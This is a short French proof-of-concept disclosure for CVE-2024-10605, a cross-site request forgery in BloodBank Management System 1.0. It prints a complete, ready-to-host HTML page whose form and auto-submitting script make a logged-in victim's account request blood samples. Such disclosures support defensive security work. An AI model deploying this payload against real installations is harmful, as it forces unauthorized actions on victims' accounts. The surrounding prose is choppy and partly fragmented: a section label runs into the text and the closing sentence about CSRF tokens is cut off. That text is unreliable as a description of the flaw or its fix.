
Preuve de concept pour CVE-2024-10605, une vulnérabilité CSRF dans BloodBank Management System 1.0 permettant des demandes d'échantillons sanguins non autorisées.
file/request.phpIl existe une Cross Site Request Forgery sur ce point de terminaison /file/request.php qui permet à un utilisateur distant d'initier une demande d'échantillon de sang sur le compte d'un connecté, à partir des échantillons de sang disponibles d'un hôpital sélectionné.
destinataireUne exploitation réussie peut entraîner des actions non autorisées au nom de la victime. De plus, cela pourrait être exploité en visitant des sites web malveillants contenant la charge utile.
Voici un exemple d'attaque CSRF PoC qui initie une demande d'échantillon de sang à partir du compte d'un destinataire connecté :
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://localhost.local/bloodbank/file/request.php" method="POST" enctype="application/x-www-form-urlencoded">
<input name="bid" value="16">
<input name="hid" value="3">
<input name="bg" value="B-">
<input name="request" value="Request+Sample">
</form>
<script>
document.querySelector("form").submit();
</script>
</body>
</html>
jetons CSRF dans votre requête.